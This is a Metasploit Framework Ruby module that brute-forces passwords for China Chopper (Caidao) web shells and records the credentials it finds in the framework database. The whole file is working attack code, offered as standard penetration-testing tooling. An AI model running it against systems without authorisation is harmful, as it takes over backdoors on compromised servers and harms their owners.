GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/caidao'
# Auxiliary scanner for the Caidao ("China Chopper") web shell.
#
# Per host it first asks the login scanner whether TARGETURI looks like a
# supported backdoor (check_setup) and only then runs the password guesses
# (PASSWORD / PASS_FILE, collected via the AuthBrute mixin). Every outcome is
# written back to the database: successes as credential + login records,
# wrong passwords and connection failures as invalidated logins.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Registers module metadata and datastore options.
  #
  # @param info [Hash] metadata supplied by the framework, merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chinese Caidao Backdoor Bruteforce',
        'Description' => 'This module attempts to bruteforce chinese caidao asp/php/aspx backdoor.',
        'Author' => ['Nixawk'],
        'References' => [
          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
          ['URL', 'https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii'],
          ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-314A'],
          ['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
        ],
        'License' => MSF_LICENSE
      )
    )

    default_pass_file = File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URL that handles the login process', '/caidao.php']),
        OptPath.new('PASS_FILE', [false, 'The file that contains a list of of probable passwords.', default_pass_file])
      ]
    )

    # The backdoor authenticates with a password only, so none of the
    # username-related options inherited from AuthBrute/HttpClient apply.
    deregister_options('HttpUsername', 'HttpPassword', 'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS')
  end

  # Returns the login scanner for +ip+, building it on first use.
  #
  # The scanner is memoized in @scanner, so this instance always returns the
  # scanner built for the first ip it was asked about.
  # NOTE(review): relies on the framework giving each host its own module
  # instance — confirm against Msf::Auxiliary::Scanner before changing.
  #
  # @param ip [String] target address
  # @return [Metasploit::Framework::LoginScanner::Caidao]
  def scanner(ip)
    @scanner ||= begin
      # The LoginScanner API refuses to run without a username, so a placeholder
      # is supplied here; report_good_cred deliberately never stores it.
      creds = build_credential_collection(username: 'caidao', password: datastore['PASSWORD'])

      Metasploit::Framework::LoginScanner::Caidao.new(
        configure_http_login_scanner(
          host: ip,
          port: datastore['RPORT'],
          uri: datastore['TARGETURI'],
          cred_details: creds,
          stop_on_success: datastore['STOP_ON_SUCCESS'],
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
          connection_timeout: 5,
          http_username: datastore['HttpUsername'],
          http_password: datastore['HttpPassword']
        )
      )
    end
  end

  # Stores a successful guess as a credential core plus a login record.
  #
  # @param ip [String] target address
  # @param port [Integer] target port
  # @param result [Metasploit::Framework::LoginScanner::Result] scan result
  # @return the value of create_credential_login
  def report_good_cred(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # Only the password is persisted; the placeholder username from #scanner is dropped.
    core = create_credential(
      service_data.merge(
        module_fullname: fullname,
        origin_type: :service,
        private_data: result.credential.private,
        private_type: :password
      )
    )

    create_credential_login(
      service_data.merge(
        core: core,
        last_attempted_at: DateTime.now,
        status: result.status,
        proof: result.proof
      )
    )
  end

  # Marks a guess as invalid in the database. Called both for wrong
  # passwords and for hosts that could not be reached (see bruteforce).
  #
  # @param ip [String] target address
  # @param rport [Integer] target port
  # @param result [Metasploit::Framework::LoginScanner::Result] scan result
  def report_bad_cred(ip, rport, result)
    cred = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      private: cred.private,
      realm_key: cred.realm_key,
      realm_value: cred.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs the password guesses against +ip+ and records each result.
  #
  # @param ip [String] target address
  def bruteforce(ip)
    scanner(ip).scan! { |result| record_result(ip, result) }
  end

  # Scanner entry point, invoked once per target host. Hosts whose TARGETURI
  # does not pass check_setup are reported and skipped.
  #
  # @param ip [String] target address
  def run_host(ip)
    return bruteforce(ip) if scanner(ip).check_setup

    print_brute(level: :error, ip: ip, msg: 'Backdoor type is not support')
    nil
  end

  private

  # Logs one scan result and persists it; statuses other than the three
  # handled here are ignored.
  def record_result(ip, result)
    case result.status
    when Metasploit::Model::Login::Status::SUCCESSFUL
      print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential.private}'")
      report_good_cred(ip, rport, result)
    when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
      vprint_brute(level: :verror, ip: ip, msg: result.proof)
      report_bad_cred(ip, rport, result)
    when Metasploit::Model::Login::Status::INCORRECT
      vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential.private}'")
      report_bad_cred(ip, rport, result)
    end
  end
end